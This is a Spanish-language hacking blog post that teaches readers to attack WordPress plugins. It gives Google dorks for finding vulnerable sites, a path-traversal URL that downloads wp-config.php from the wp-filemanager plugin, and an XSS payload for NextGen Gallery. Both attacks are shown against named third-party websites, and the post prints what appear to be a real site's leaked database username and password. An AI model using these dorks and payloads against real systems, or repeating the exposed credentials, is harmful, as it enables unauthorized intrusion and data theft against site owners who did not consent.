Saludos nuevamente mis queridos y fieles lectores de este humilde blog,
en esta oportunidad tocaremos el tema sobre la explotación de un "cms"
como Wordpress, mediante los exploit's de url en los sectores
vulnerables o débiles de privilegios
Exploit
Local File Download Wordpresss
La vulnerabilidad archivo de descarga de servidor local, nos permite
descargas contenido de información de base de datos las cuales el
atacante puede aprovechar para la penetración el servidor web de una
manera fácil y rápida
Dork
inurl:/wp-content/plugins/wp-filemanager/ site:.com
Exploit :
/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
Ejemplo de ataque :
Link de la web la cual ingresaste el dork
" http://www.wildrift.com/wp-content/plugins/wp-filemanager/" , luego de
ello introducirás lo siguiente "
/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
"
Como vemos en la imagen, podemos ver que al introducir el exploit ,
automáticamente nos descarga el archivo config.php, bien lo guardaremos
Archivo "config.php"
INFORMACIÓN DE BD
('DB_USER', 'wildri8u_advent');
/** MySQL database password */
define('DB_PASSWORD', 'xa.+(&]AUyrR');
/** MySQL hostname */
define('DB_HOST', 'localhost');
Exploit
Cross Site Scripting
Como todos sabemos lo que es un error " Cross Site Scripting " , no es
necesario que lo diga en este párrafo, pero dejare la referencia de ello
en este link :
http://backtrack-omar.blogspot.com/2013/02/cross-site-scripting-xss.html
Bueno prosigamos, en el modulo de plugins "Plugin NextGen," , se ah
descubierto que este complemento tiene un grave error de "XSS", la cual
puede ser aprovechado para varios tipos de ataques dirigidos de
cualquier persona que tenga conocimientos de cada uno de ellos.
Dork :
inurl:/wp-content/plugins/wp-filemanager/ site:.com
Exploit :
/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('X4r0r-MostSecurity');//
Ejemplo :
drfranklipman.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('backtrack-omar.blogspot.com');//
Saludos!!
No hay comentarios:
Publicar un comentario